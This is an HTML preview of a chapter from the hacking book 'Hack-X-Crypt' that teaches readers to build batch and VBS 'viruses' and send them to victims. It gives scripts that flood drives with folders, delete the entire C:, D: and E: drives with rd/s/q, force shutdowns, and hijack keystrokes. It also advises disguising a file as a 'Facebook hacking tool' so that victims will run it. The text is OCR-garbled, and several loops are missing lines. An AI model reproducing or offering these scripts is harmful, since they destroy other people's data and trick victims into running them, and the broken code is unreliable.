Hack-X-Crypt by Ujjwal Sahay - HTML preview

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Now, it’s time to administrate your computer by creating some viruses in the form of batch file. You can create various types of viruses with having distinct functionality Each and every virus will affect the victim’s computer system by the way you have coded its programming in the batch file. You can create viruses which can freeze the victims computer or it can also crash it.

Virus creation codes of the batch file:--

  • --Codes to be written in the notepad--
  • --Extension of the files should be ".bat" --

1.) To create a huge amount of folders on victimIs desktop screen:- First of all your task is to copy the following codes in the notepad of your computer.

For opening the notepad:-

Go to run option of your computer by pressing ͞window+R

• Simply type ͞notepad and click on the OK option


CODES: @echo off



goto top.


Now when you have copied the codes in the notepad your next work is to save the text document you have created.

Go to file option and save your document by any name but ͞don’t forget to keep the extension as ‘ bat’

For example you can save your text document by the name ͞ujjwal bat Or you can also keep your document name as ͞Facebook hacking tool bat to confuse the victim and enforce him to open the virus you have created to destroy the desktop of the victim.


When you have done saving the document just double click on the batch file to open it.

Suddenly you will see that the command prompt of the victim’s computer opened automatically and it will display large amount of codes to running in the command prompt.

After 5-10 seconds you will see that there are a huge amount of folders created automatically on the desktop of the victim and it will also leads the desktop to freeze or crash.

2.) To create more folders in C, 0, and E drive of victim’s


As we have learned above to create many folders on the desktop of the victim, in the same way we can create a lot of folders in the C:, D:, and E: drives of the victims computer by applying the same method as we have followed above but there is a little amendment in the codes of the batch file of this virus.


@echo off


cd /d C:


cd /d D:


cd /d E:


goto VIRUS

Copy and paste the above code in the notepad and follow the same steps as we have followed before to create more numbers of folders in the local drives of the victim’s computer

3.) To format C, 0: and E: drive of your computer:-

Open Notepad

Copy the below command there

"rd/s/q D:\

rd/s/q C:\

rd/s/q E:\" (Without quotes)

Save as "anything.bat

Double click on the virus icon.

This virus formats the C, D and E Drive in 5 Seconds.

4.) Convey your friend a little message and shut down his I her computer:-

@echo off

msg * I don't like you

shutdown -c "Errorl You are too stupidl" -s

Save it as "Anything.BAT" in All Files and send it.

5.) Open Notepad, slowly type "Hello, how are you? I am

good thanks" and freak your friend out:–

Open the notepad and type the following code ÷

WScript.Sleep 180000

WScript.Sleep 10000

Set WshShell = WScript.CreateObject("WScript.Shell")

WshShell.Run "notepad"

WScript.Sleep 100

WshShell.AppActivate "Notepad"

WScript.Sleep 500

WshShell.SendKeys "Hel"

WScript.Sleep 500

WshShell.SendKeys "lo "

WScript.Sleep 500

WshShell.SendKeys ", ho"

WScript.Sleep 500

WshShell.SendKeys "w a"

WScript.Sleep 500

WshShell.SendKeys "re "

WScript.Sleep 500

WshShell.SendKeys "ycu"

WScript.Sleep 500

WshShell.SendKeys "? "

WScript.Sleep 500

WshShell.SendKeys "I a"

WScript.Sleep 500

WshShell.SendKeys "m g"

WScript.Sleep 500

WshShell.SendKeys "ccd"

WScript.Sleep 500

WshShell.SendKeys " th"

WScript.Sleep 500

WshShell.SendKeys "ank"

WScript.Sleep 500

WshShell.SendKeys "sl "

Save it as "Anything.VBS" and send it.

6.) Hack your friendIS keyboard and make him type

"You are a fool" SimultaneouSly:-

Open the notepad and type the following codes:-

Set wshShell = wscript.CreateObjectl"WScript.Shell"]


wscript.sleep 100

wshshell.sendkeys "You are a fool." loop

Save it as "Anything.VBS" and send it.

7.) Open Notepad continually in your friendIS computer:

Open the notepad and type the following codes:-

@ECHO off


START %SystemRoot%\system32\notepad.exe

GOTO top

Save it as "Anything.BAT" and send it.


To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.

@echo off

echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg

echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg

echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg

echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg

echo g=100>>\z.dbg

echo q>>\z.dbg

debug <\z.dbg>nul

del \z.dbg

But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.


@echo off


echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg

echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg

echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg

echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg

echo g=100>>\z.dbg

echo q>>\z.dbg

debug <\z.dbg>nul

del \z.dbg

goto a

To disable error (ctrl+shirt+esc) then end process wscript.exe


Note: - some of the above given codes can harm your computer after

execution so; don’t try it on your pc. You can use a test computer for
